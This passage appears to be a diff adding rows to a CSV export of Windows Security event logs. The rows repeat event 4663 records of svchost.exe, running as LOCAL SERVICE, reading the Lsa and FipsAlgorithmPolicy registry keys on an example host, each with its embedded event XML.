+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452894</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452893</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452891</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452889</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452888</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452887</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452886</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452885</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452884</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452883</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452882</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452881</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452880</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
